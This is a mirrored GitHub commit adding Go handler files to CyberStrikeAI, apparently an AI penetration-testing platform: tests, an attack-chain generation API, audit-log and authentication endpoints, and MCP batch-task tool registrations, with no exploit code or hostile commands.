mirror of
https://github.com/Ed1s0nZ/CyberStrikeAI.git
synced 2026-06-20 04:50:10 +02:00
Add files via upload
This commit is contained in:
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,99 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"sync"
|
||||
"testing"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/database"
|
||||
"cyberstrike-ai/internal/openai"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// TestCreateProgressCallback_ConcurrentToolEvents 回归 issue #142:并行 tool 回调不得 concurrent map panic。
|
||||
func TestCreateProgressCallback_ConcurrentToolEvents(t *testing.T) {
|
||||
logger := zap.NewNop()
|
||||
h := &AgentHandler{
|
||||
logger: logger,
|
||||
config: &config.Config{},
|
||||
}
|
||||
cb := h.createProgressCallback(context.Background(), nil, "conv-race-test", "", nil)
|
||||
|
||||
const workers = 64
|
||||
var wg sync.WaitGroup
|
||||
wg.Add(workers * 2)
|
||||
for i := 0; i < workers; i++ {
|
||||
i := i
|
||||
go func() {
|
||||
defer wg.Done()
|
||||
toolCallID := fmt.Sprintf("tc-%d", i)
|
||||
cb("tool_call", "calling skill", map[string]interface{}{
|
||||
"toolCallId": toolCallID,
|
||||
"toolName": "skill",
|
||||
"argumentsObj": map[string]interface{}{"skill_name": "demo-skill"},
|
||||
})
|
||||
}()
|
||||
go func() {
|
||||
defer wg.Done()
|
||||
toolCallID := fmt.Sprintf("tc-%d", i)
|
||||
cb("tool_result", "skill done", map[string]interface{}{
|
||||
"toolCallId": toolCallID,
|
||||
"toolName": "skill",
|
||||
"success": true,
|
||||
})
|
||||
}()
|
||||
}
|
||||
wg.Wait()
|
||||
}
|
||||
|
||||
// TestCreateProgressCallback_FlushesReasoningOnDone 流式推理聚合须在 done/response 时落库,刷新后可回放。
|
||||
func TestCreateProgressCallback_FlushesReasoningOnDone(t *testing.T) {
|
||||
tmp := t.TempDir()
|
||||
db, err := database.NewDB(filepath.Join(tmp, "test.sqlite"), zap.NewNop())
|
||||
if err != nil {
|
||||
t.Fatalf("NewDB: %v", err)
|
||||
}
|
||||
defer os.RemoveAll(tmp)
|
||||
|
||||
conv, err := db.CreateConversation("test", database.ConversationCreateMeta{})
|
||||
if err != nil {
|
||||
t.Fatalf("CreateConversation: %v", err)
|
||||
}
|
||||
asst, err := db.AddMessage(conv.ID, "assistant", "处理中...", nil)
|
||||
if err != nil {
|
||||
t.Fatalf("AddMessage: %v", err)
|
||||
}
|
||||
|
||||
h := &AgentHandler{logger: zap.NewNop(), db: db}
|
||||
cb := h.createProgressCallback(context.Background(), nil, conv.ID, asst.ID, nil)
|
||||
|
||||
streamID := "eino-reasoning-test-1"
|
||||
cb("reasoning_chain_stream_start", " ", map[string]interface{}{
|
||||
"streamId": streamID,
|
||||
"source": "eino",
|
||||
})
|
||||
cb("reasoning_chain_stream_delta", "step one", openai.WithSSEAccumulated(map[string]interface{}{
|
||||
"streamId": streamID,
|
||||
}, "step one"))
|
||||
cb("done", "", map[string]interface{}{"conversationId": conv.ID})
|
||||
|
||||
details, err := db.GetProcessDetails(asst.ID)
|
||||
if err != nil {
|
||||
t.Fatalf("GetProcessDetails: %v", err)
|
||||
}
|
||||
found := false
|
||||
for _, d := range details {
|
||||
if d.EventType == "reasoning_chain" && d.Message == "step one" {
|
||||
found = true
|
||||
break
|
||||
}
|
||||
}
|
||||
if !found {
|
||||
t.Fatalf("expected reasoning_chain persisted on done, got %+v", details)
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,172 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"context"
|
||||
"net/http"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/attackchain"
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// AttackChainHandler 攻击链处理器
|
||||
type AttackChainHandler struct {
|
||||
db *database.DB
|
||||
logger *zap.Logger
|
||||
openAIConfig *config.OpenAIConfig
|
||||
mu sync.RWMutex // 保护 openAIConfig 的并发访问
|
||||
// 用于防止同一对话的并发生成
|
||||
generatingLocks sync.Map // map[string]*sync.Mutex
|
||||
}
|
||||
|
||||
// NewAttackChainHandler 创建新的攻击链处理器
|
||||
func NewAttackChainHandler(db *database.DB, openAIConfig *config.OpenAIConfig, logger *zap.Logger) *AttackChainHandler {
|
||||
return &AttackChainHandler{
|
||||
db: db,
|
||||
logger: logger,
|
||||
openAIConfig: openAIConfig,
|
||||
}
|
||||
}
|
||||
|
||||
// UpdateConfig 更新OpenAI配置
|
||||
func (h *AttackChainHandler) UpdateConfig(cfg *config.OpenAIConfig) {
|
||||
h.mu.Lock()
|
||||
defer h.mu.Unlock()
|
||||
h.openAIConfig = cfg
|
||||
h.logger.Info("AttackChainHandler配置已更新",
|
||||
zap.String("base_url", cfg.BaseURL),
|
||||
zap.String("model", cfg.Model),
|
||||
)
|
||||
}
|
||||
|
||||
// getOpenAIConfig 获取OpenAI配置(线程安全)
|
||||
func (h *AttackChainHandler) getOpenAIConfig() *config.OpenAIConfig {
|
||||
h.mu.RLock()
|
||||
defer h.mu.RUnlock()
|
||||
return h.openAIConfig
|
||||
}
|
||||
|
||||
// GetAttackChain 获取攻击链(按需生成)
|
||||
// GET /api/attack-chain/:conversationId
|
||||
func (h *AttackChainHandler) GetAttackChain(c *gin.Context) {
|
||||
conversationID := c.Param("conversationId")
|
||||
if conversationID == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "conversationId is required"})
|
||||
return
|
||||
}
|
||||
|
||||
// 检查对话是否存在
|
||||
_, err := h.db.GetConversation(conversationID)
|
||||
if err != nil {
|
||||
h.logger.Warn("对话不存在", zap.String("conversationId", conversationID), zap.Error(err))
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "对话不存在"})
|
||||
return
|
||||
}
|
||||
|
||||
// 先尝试从数据库加载(如果已生成过)
|
||||
openAIConfig := h.getOpenAIConfig()
|
||||
builder := attackchain.NewBuilder(h.db, openAIConfig, h.logger)
|
||||
chain, err := builder.LoadChainFromDatabase(conversationID)
|
||||
if err == nil && len(chain.Nodes) > 0 {
|
||||
// 如果已存在,直接返回
|
||||
h.logger.Info("返回已存在的攻击链", zap.String("conversationId", conversationID))
|
||||
c.JSON(http.StatusOK, chain)
|
||||
return
|
||||
}
|
||||
|
||||
// 如果不存在,则生成新的攻击链(按需生成)
|
||||
// 使用锁机制防止同一对话的并发生成
|
||||
lockInterface, _ := h.generatingLocks.LoadOrStore(conversationID, &sync.Mutex{})
|
||||
lock := lockInterface.(*sync.Mutex)
|
||||
|
||||
// 尝试获取锁,如果正在生成则返回错误
|
||||
acquired := lock.TryLock()
|
||||
if !acquired {
|
||||
h.logger.Info("攻击链正在生成中,请稍后再试", zap.String("conversationId", conversationID))
|
||||
c.JSON(http.StatusConflict, gin.H{"error": "攻击链正在生成中,请稍后再试"})
|
||||
return
|
||||
}
|
||||
defer lock.Unlock()
|
||||
|
||||
// 再次检查是否已生成(可能在等待锁的过程中已经生成完成)
|
||||
chain, err = builder.LoadChainFromDatabase(conversationID)
|
||||
if err == nil && len(chain.Nodes) > 0 {
|
||||
h.logger.Info("返回已存在的攻击链(在锁等待期间已生成)", zap.String("conversationId", conversationID))
|
||||
c.JSON(http.StatusOK, chain)
|
||||
return
|
||||
}
|
||||
|
||||
h.logger.Info("开始生成攻击链", zap.String("conversationId", conversationID))
|
||||
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Minute)
|
||||
defer cancel()
|
||||
|
||||
chain, err = builder.BuildChainFromConversation(ctx, conversationID)
|
||||
if err != nil {
|
||||
h.logger.Error("生成攻击链失败", zap.String("conversationId", conversationID), zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "生成攻击链失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
// 生成完成后,从锁映射中删除(可选,保留也可以用于防止短时间内重复生成)
|
||||
// h.generatingLocks.Delete(conversationID)
|
||||
|
||||
c.JSON(http.StatusOK, chain)
|
||||
}
|
||||
|
||||
// RegenerateAttackChain 重新生成攻击链
|
||||
// POST /api/attack-chain/:conversationId/regenerate
|
||||
func (h *AttackChainHandler) RegenerateAttackChain(c *gin.Context) {
|
||||
conversationID := c.Param("conversationId")
|
||||
if conversationID == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "conversationId is required"})
|
||||
return
|
||||
}
|
||||
|
||||
// 检查对话是否存在
|
||||
_, err := h.db.GetConversation(conversationID)
|
||||
if err != nil {
|
||||
h.logger.Warn("对话不存在", zap.String("conversationId", conversationID), zap.Error(err))
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "对话不存在"})
|
||||
return
|
||||
}
|
||||
|
||||
// 删除旧的攻击链
|
||||
if err := h.db.DeleteAttackChain(conversationID); err != nil {
|
||||
h.logger.Warn("删除旧攻击链失败", zap.Error(err))
|
||||
}
|
||||
|
||||
// 使用锁机制防止并发生成
|
||||
lockInterface, _ := h.generatingLocks.LoadOrStore(conversationID, &sync.Mutex{})
|
||||
lock := lockInterface.(*sync.Mutex)
|
||||
|
||||
acquired := lock.TryLock()
|
||||
if !acquired {
|
||||
h.logger.Info("攻击链正在生成中,请稍后再试", zap.String("conversationId", conversationID))
|
||||
c.JSON(http.StatusConflict, gin.H{"error": "攻击链正在生成中,请稍后再试"})
|
||||
return
|
||||
}
|
||||
defer lock.Unlock()
|
||||
|
||||
// 生成新的攻击链
|
||||
h.logger.Info("重新生成攻击链", zap.String("conversationId", conversationID))
|
||||
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Minute)
|
||||
defer cancel()
|
||||
|
||||
openAIConfig := h.getOpenAIConfig()
|
||||
builder := attackchain.NewBuilder(h.db, openAIConfig, h.logger)
|
||||
chain, err := builder.BuildChainFromConversation(ctx, conversationID)
|
||||
if err != nil {
|
||||
h.logger.Error("生成攻击链失败", zap.String("conversationId", conversationID), zap.Error(err))
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "生成攻击链失败: " + err.Error()})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, chain)
|
||||
}
|
||||
@@ -0,0 +1,147 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"net/http"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/audit"
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// AuditHandler serves platform audit log APIs.
|
||||
type AuditHandler struct {
|
||||
db *database.DB
|
||||
audit *audit.Service
|
||||
logger *zap.Logger
|
||||
}
|
||||
|
||||
// NewAuditHandler creates an audit log handler.
|
||||
func NewAuditHandler(db *database.DB, auditSvc *audit.Service, logger *zap.Logger) *AuditHandler {
|
||||
return &AuditHandler{db: db, audit: auditSvc, logger: logger}
|
||||
}
|
||||
|
||||
// Meta GET /api/audit/meta
|
||||
func (h *AuditHandler) Meta(c *gin.Context) {
|
||||
enabled := false
|
||||
retentionDays := 0
|
||||
if h.audit != nil {
|
||||
enabled = h.audit.Enabled()
|
||||
retentionDays = h.audit.RetentionDays()
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"enabled": enabled,
|
||||
"retention_days": retentionDays,
|
||||
"default_page_size": 20,
|
||||
"max_page_size": 100,
|
||||
"max_export": 5000,
|
||||
})
|
||||
}
|
||||
|
||||
// Summary GET /api/audit/summary
|
||||
func (h *AuditHandler) Summary(c *gin.Context) {
|
||||
if h.db == nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "database unavailable"})
|
||||
return
|
||||
}
|
||||
base := auditFilterFromQuery(c)
|
||||
total, err := h.db.CountAuditLogs(base)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
failFilter := base
|
||||
failFilter.Result = "failure"
|
||||
failures, err := h.db.CountAuditLogs(failFilter)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
since := time.Now().AddDate(0, 0, -7)
|
||||
recentFilter := base
|
||||
recentFilter.Since = &since
|
||||
recent7d, err := h.db.CountAuditLogs(recentFilter)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"total": total,
|
||||
"failures": failures,
|
||||
"recent_7d": recent7d,
|
||||
"has_filters": c.Query("category") != "" || c.Query("action") != "" || c.Query("result") != "" ||
|
||||
c.Query("q") != "" || c.Query("since") != "" || c.Query("until") != "",
|
||||
})
|
||||
}
|
||||
|
||||
// ListLogs GET /api/audit/logs
|
||||
func (h *AuditHandler) ListLogs(c *gin.Context) {
|
||||
if h.db == nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "database unavailable"})
|
||||
return
|
||||
}
|
||||
filter := auditFilterFromQuery(c)
|
||||
page, pageSize := auditPaginationFromQuery(c)
|
||||
filter.Limit = pageSize
|
||||
filter.Offset = (page - 1) * pageSize
|
||||
|
||||
logs, err := h.db.ListAuditLogs(filter)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
total, err := h.db.CountAuditLogs(filter)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"logs": logs,
|
||||
"total": total,
|
||||
"page": page,
|
||||
"page_size": pageSize,
|
||||
})
|
||||
}
|
||||
|
||||
// GetLog GET /api/audit/logs/:id
|
||||
func (h *AuditHandler) GetLog(c *gin.Context) {
|
||||
if h.db == nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "database unavailable"})
|
||||
return
|
||||
}
|
||||
row, err := h.db.GetAuditLogByID(c.Param("id"))
|
||||
if err != nil {
|
||||
c.JSON(http.StatusNotFound, gin.H{"error": "审计记录不存在"})
|
||||
return
|
||||
}
|
||||
audit.ApplyResourceAvailability(h.db, row)
|
||||
c.JSON(http.StatusOK, gin.H{"log": row})
|
||||
}
|
||||
|
||||
// ExportLogs GET /api/audit/logs/export — JSON or CSV (?format=csv), max 5000 rows.
|
||||
func (h *AuditHandler) ExportLogs(c *gin.Context) {
|
||||
if h.db == nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "database unavailable"})
|
||||
return
|
||||
}
|
||||
filter := auditFilterFromQuery(c)
|
||||
filter.Limit = 5000
|
||||
filter.Offset = 0
|
||||
|
||||
logs, err := h.db.ListAuditLogs(filter)
|
||||
if err != nil {
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
|
||||
return
|
||||
}
|
||||
if c.Query("format") == "csv" {
|
||||
writeAuditLogsCSV(c, logs)
|
||||
return
|
||||
}
|
||||
c.Header("Content-Disposition", `attachment; filename="audit-logs.json"`)
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"exported_at": time.Now().UTC().Format(time.RFC3339),
|
||||
"logs": logs,
|
||||
})
|
||||
}
|
||||
@@ -0,0 +1,42 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"encoding/csv"
|
||||
"fmt"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
)
|
||||
|
||||
func writeAuditLogsCSV(c *gin.Context, logs []*database.AuditLog) {
|
||||
c.Header("Content-Type", "text/csv; charset=utf-8")
|
||||
c.Header("Content-Disposition", fmt.Sprintf(`attachment; filename="audit-logs-%s.csv"`, time.Now().Format("20060102")))
|
||||
|
||||
w := csv.NewWriter(c.Writer)
|
||||
_ = w.Write([]string{
|
||||
"id", "created_at", "level", "category", "action", "result", "actor",
|
||||
"session_hint", "client_ip", "resource_type", "resource_id", "message",
|
||||
})
|
||||
for _, row := range logs {
|
||||
if row == nil {
|
||||
continue
|
||||
}
|
||||
_ = w.Write([]string{
|
||||
row.ID,
|
||||
row.CreatedAt.UTC().Format(time.RFC3339),
|
||||
row.Level,
|
||||
row.Category,
|
||||
row.Action,
|
||||
row.Result,
|
||||
row.Actor,
|
||||
row.SessionHint,
|
||||
row.ClientIP,
|
||||
row.ResourceType,
|
||||
row.ResourceID,
|
||||
row.Message,
|
||||
})
|
||||
}
|
||||
w.Flush()
|
||||
}
|
||||
@@ -0,0 +1,47 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"strconv"
|
||||
|
||||
"cyberstrike-ai/internal/database"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
)
|
||||
|
||||
func auditFilterFromQuery(c *gin.Context) database.ListAuditLogsFilter {
|
||||
filter := database.ListAuditLogsFilter{
|
||||
Level: c.Query("level"),
|
||||
Category: c.Query("category"),
|
||||
Action: c.Query("action"),
|
||||
Result: c.Query("result"),
|
||||
Query: c.Query("q"),
|
||||
ResourceType: c.Query("resource_type"),
|
||||
ResourceID: c.Query("resource_id"),
|
||||
}
|
||||
if since := c.Query("since"); since != "" {
|
||||
if t, err := database.ParseRFC3339Time(since); err == nil {
|
||||
filter.Since = &t
|
||||
}
|
||||
}
|
||||
if until := c.Query("until"); until != "" {
|
||||
if t, err := database.ParseRFC3339Time(until); err == nil {
|
||||
filter.Until = &t
|
||||
}
|
||||
}
|
||||
return filter
|
||||
}
|
||||
|
||||
func auditPaginationFromQuery(c *gin.Context) (page, pageSize int) {
|
||||
page = 1
|
||||
pageSize = 20
|
||||
if p, err := strconv.Atoi(c.DefaultQuery("page", "1")); err == nil && p > 0 {
|
||||
page = p
|
||||
}
|
||||
if ps, err := strconv.Atoi(c.DefaultQuery("page_size", "20")); err == nil && ps > 0 {
|
||||
pageSize = ps
|
||||
if pageSize > 100 {
|
||||
pageSize = 100
|
||||
}
|
||||
}
|
||||
return page, pageSize
|
||||
}
|
||||
@@ -0,0 +1,211 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"net/http"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/audit"
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/security"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// AuthHandler handles authentication-related endpoints.
|
||||
type AuthHandler struct {
|
||||
manager *security.AuthManager
|
||||
config *config.Config
|
||||
configPath string
|
||||
logger *zap.Logger
|
||||
audit *audit.Service
|
||||
}
|
||||
|
||||
// SetAudit wires platform audit logging.
|
||||
func (h *AuthHandler) SetAudit(s *audit.Service) {
|
||||
h.audit = s
|
||||
}
|
||||
|
||||
// NewAuthHandler creates a new AuthHandler.
|
||||
func NewAuthHandler(manager *security.AuthManager, cfg *config.Config, configPath string, logger *zap.Logger) *AuthHandler {
|
||||
return &AuthHandler{
|
||||
manager: manager,
|
||||
config: cfg,
|
||||
configPath: configPath,
|
||||
logger: logger,
|
||||
}
|
||||
}
|
||||
|
||||
type loginRequest struct {
|
||||
Password string `json:"password" binding:"required"`
|
||||
}
|
||||
|
||||
type changePasswordRequest struct {
|
||||
OldPassword string `json:"oldPassword"`
|
||||
NewPassword string `json:"newPassword"`
|
||||
}
|
||||
|
||||
// Login verifies password and returns a session token.
|
||||
func (h *AuthHandler) Login(c *gin.Context) {
|
||||
var req loginRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "密码不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
token, expiresAt, err := h.manager.Authenticate(req.Password)
|
||||
if err != nil {
|
||||
if h.audit != nil {
|
||||
h.audit.Record(c, audit.Entry{
|
||||
Level: "warn",
|
||||
Category: "auth",
|
||||
Action: "login",
|
||||
Result: "failure",
|
||||
Message: "登录失败:密码错误",
|
||||
})
|
||||
}
|
||||
c.JSON(http.StatusUnauthorized, gin.H{"error": "密码错误"})
|
||||
return
|
||||
}
|
||||
|
||||
if h.audit != nil {
|
||||
h.audit.Record(c, audit.Entry{
|
||||
Category: "auth",
|
||||
Action: "login",
|
||||
Result: "success",
|
||||
SessionHint: audit.HintFromToken(token),
|
||||
Message: "登录成功",
|
||||
Detail: map[string]interface{}{
|
||||
"expires_at": expiresAt.UTC().Format(time.RFC3339),
|
||||
},
|
||||
})
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"token": token,
|
||||
"expires_at": expiresAt.UTC().Format(time.RFC3339),
|
||||
"session_duration_hr": h.manager.SessionDurationHours(),
|
||||
})
|
||||
}
|
||||
|
||||
// Logout revokes the current session token.
|
||||
func (h *AuthHandler) Logout(c *gin.Context) {
|
||||
token := c.GetString(security.ContextAuthTokenKey)
|
||||
if token == "" {
|
||||
authHeader := c.GetHeader("Authorization")
|
||||
if len(authHeader) > 7 && strings.EqualFold(authHeader[:7], "Bearer ") {
|
||||
token = strings.TrimSpace(authHeader[7:])
|
||||
} else {
|
||||
token = strings.TrimSpace(authHeader)
|
||||
}
|
||||
}
|
||||
|
||||
h.manager.RevokeToken(token)
|
||||
if h.audit != nil {
|
||||
h.audit.Record(c, audit.Entry{
|
||||
Category: "auth",
|
||||
Action: "logout",
|
||||
Result: "success",
|
||||
Message: "退出登录",
|
||||
})
|
||||
}
|
||||
c.JSON(http.StatusOK, gin.H{"message": "已退出登录"})
|
||||
}
|
||||
|
||||
// ChangePassword updates the login password.
|
||||
func (h *AuthHandler) ChangePassword(c *gin.Context) {
|
||||
var req changePasswordRequest
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "参数无效"})
|
||||
return
|
||||
}
|
||||
|
||||
oldPassword := strings.TrimSpace(req.OldPassword)
|
||||
newPassword := strings.TrimSpace(req.NewPassword)
|
||||
|
||||
if oldPassword == "" || newPassword == "" {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "当前密码和新密码均不能为空"})
|
||||
return
|
||||
}
|
||||
|
||||
if len(newPassword) < 8 {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "新密码长度至少需要 8 位"})
|
||||
return
|
||||
}
|
||||
|
||||
if oldPassword == newPassword {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "新密码不能与旧密码相同"})
|
||||
return
|
||||
}
|
||||
|
||||
if !h.manager.CheckPassword(oldPassword) {
|
||||
if h.audit != nil {
|
||||
h.audit.Record(c, audit.Entry{
|
||||
Level: "warn",
|
||||
Category: "auth",
|
||||
Action: "change_password",
|
||||
Result: "failure",
|
||||
Message: "修改密码失败:当前密码不正确",
|
||||
})
|
||||
}
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "当前密码不正确"})
|
||||
return
|
||||
}
|
||||
|
||||
if err := config.PersistAuthPassword(h.configPath, newPassword); err != nil {
|
||||
if h.logger != nil {
|
||||
h.logger.Error("保存新密码失败", zap.Error(err))
|
||||
}
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "保存新密码失败,请重试"})
|
||||
return
|
||||
}
|
||||
|
||||
if err := h.manager.UpdateConfig(newPassword, h.config.Auth.SessionDurationHours); err != nil {
|
||||
if h.logger != nil {
|
||||
h.logger.Error("更新认证配置失败", zap.Error(err))
|
||||
}
|
||||
c.JSON(http.StatusInternalServerError, gin.H{"error": "更新认证配置失败"})
|
||||
return
|
||||
}
|
||||
|
||||
h.config.Auth.Password = newPassword
|
||||
h.config.Auth.GeneratedPassword = ""
|
||||
h.config.Auth.GeneratedPasswordPersisted = false
|
||||
h.config.Auth.GeneratedPasswordPersistErr = ""
|
||||
|
||||
if h.logger != nil {
|
||||
h.logger.Info("登录密码已更新,所有会话已失效")
|
||||
}
|
||||
|
||||
if h.audit != nil {
|
||||
h.audit.Record(c, audit.Entry{
|
||||
Category: "auth",
|
||||
Action: "change_password",
|
||||
Result: "success",
|
||||
Message: "登录密码已修改",
|
||||
})
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{"message": "密码已更新,请使用新密码重新登录"})
|
||||
}
|
||||
|
||||
// Validate returns the current session status.
|
||||
func (h *AuthHandler) Validate(c *gin.Context) {
|
||||
token := c.GetString(security.ContextAuthTokenKey)
|
||||
if token == "" {
|
||||
c.JSON(http.StatusUnauthorized, gin.H{"error": "会话无效"})
|
||||
return
|
||||
}
|
||||
|
||||
session, ok := h.manager.ValidateToken(token)
|
||||
if !ok {
|
||||
c.JSON(http.StatusUnauthorized, gin.H{"error": "会话已过期"})
|
||||
return
|
||||
}
|
||||
|
||||
c.JSON(http.StatusOK, gin.H{
|
||||
"token": session.Token,
|
||||
"expires_at": session.ExpiresAt.UTC().Format(time.RFC3339),
|
||||
})
|
||||
}
|
||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,831 @@
|
||||
package handler
|
||||
|
||||
import (
|
||||
"context"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"strconv"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
"cyberstrike-ai/internal/mcp/builtin"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// RegisterBatchTaskMCPTools 注册批量任务队列相关 MCP 工具(需传入已初始化 DB 的 AgentHandler)
|
||||
func RegisterBatchTaskMCPTools(mcpServer *mcp.Server, h *AgentHandler, logger *zap.Logger) {
|
||||
if mcpServer == nil || h == nil || logger == nil {
|
||||
return
|
||||
}
|
||||
|
||||
reg := func(tool mcp.Tool, fn func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error)) {
|
||||
mcpServer.RegisterTool(tool, fn)
|
||||
}
|
||||
|
||||
// --- list ---
|
||||
reg(mcp.Tool{
|
||||
Name: builtin.ToolBatchTaskList,
|
||||
Description: "列出批量任务队列(精简摘要,省上下文)。含队列元数据、子任务 id/status/截断后的 message、各状态计数。完整子任务(含 result/error/conversationId/时间等)请用 batch_task_get(queue_id)。\n\n⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确提及查看/管理批量任务、任务队列时才可调用。不要在用户未要求时自行调用。",
|
||||
ShortDescription: "列出批量任务队列",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"status": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "筛选状态:all(默认)、pending、running、paused、completed、cancelled",
|
||||
"enum": []string{"all", "pending", "running", "paused", "completed", "cancelled"},
|
||||
},
|
||||
"keyword": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "按队列 ID 或标题模糊搜索",
|
||||
},
|
||||
"page": map[string]interface{}{
|
||||
"type": "integer",
|
||||
"description": "页码,从 1 开始,默认 1",
|
||||
},
|
||||
"page_size": map[string]interface{}{
|
||||
"type": "integer",
|
||||
"description": "每页条数,默认 20,最大 100",
|
||||
},
|
||||
},
|
||||
},
|
||||
}, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
status := mcpArgString(args, "status")
|
||||
if status == "" {
|
||||
status = "all"
|
||||
}
|
||||
keyword := mcpArgString(args, "keyword")
|
||||
page := int(mcpArgFloat(args, "page"))
|
||||
if page <= 0 {
|
||||
page = 1
|
||||
}
|
||||
pageSize := int(mcpArgFloat(args, "page_size"))
|
||||
if pageSize <= 0 {
|
||||
pageSize = 20
|
||||
}
|
||||
if pageSize > 100 {
|
||||
pageSize = 100
|
||||
}
|
||||
offset := (page - 1) * pageSize
|
||||
if offset > 100000 {
|
||||
offset = 100000
|
||||
}
|
||||
queues, total, err := h.batchTaskManager.ListQueues(pageSize, offset, status, keyword)
|
||||
if err != nil {
|
||||
return batchMCPTextResult(fmt.Sprintf("列出队列失败: %v", err), true), nil
|
||||
}
|
||||
totalPages := (total + pageSize - 1) / pageSize
|
||||
if totalPages == 0 {
|
||||
totalPages = 1
|
||||
}
|
||||
slim := make([]batchTaskQueueMCPListItem, 0, len(queues))
|
||||
for _, q := range queues {
|
||||
if q == nil {
|
||||
continue
|
||||
}
|
||||
slim = append(slim, toBatchTaskQueueMCPListItem(q))
|
||||
}
|
||||
payload := map[string]interface{}{
|
||||
"queues": slim,
|
||||
"total": total,
|
||||
"page": page,
|
||||
"page_size": pageSize,
|
||||
"total_pages": totalPages,
|
||||
}
|
||||
logger.Info("MCP batch_task_list", zap.String("status", status), zap.Int("total", total))
|
||||
return batchMCPJSONResult(payload)
|
||||
})
|
||||
|
||||
// --- get ---
|
||||
reg(mcp.Tool{
|
||||
Name: builtin.ToolBatchTaskGet,
|
||||
Description: "根据 queue_id 获取单个批量任务队列详情(含子任务列表、Cron、调度开关与最近错误信息)。\n\n⚠️ 调用约束:本工具属于「任务管理」模块,仅当用户明确提及查看/管理批量任务、任务队列时才可调用。不要在用户未要求时自行调用。",
|
||||
ShortDescription: "获取批量任务队列详情",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"queue_id": map[string]interface{}{
|
||||
"type": "string",
|
||||
"description": "队列 ID",
|
||||
},
|
||||
},
|
||||
"required": []string{"queue_id"},
|
||||
},
|
||||
}, func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
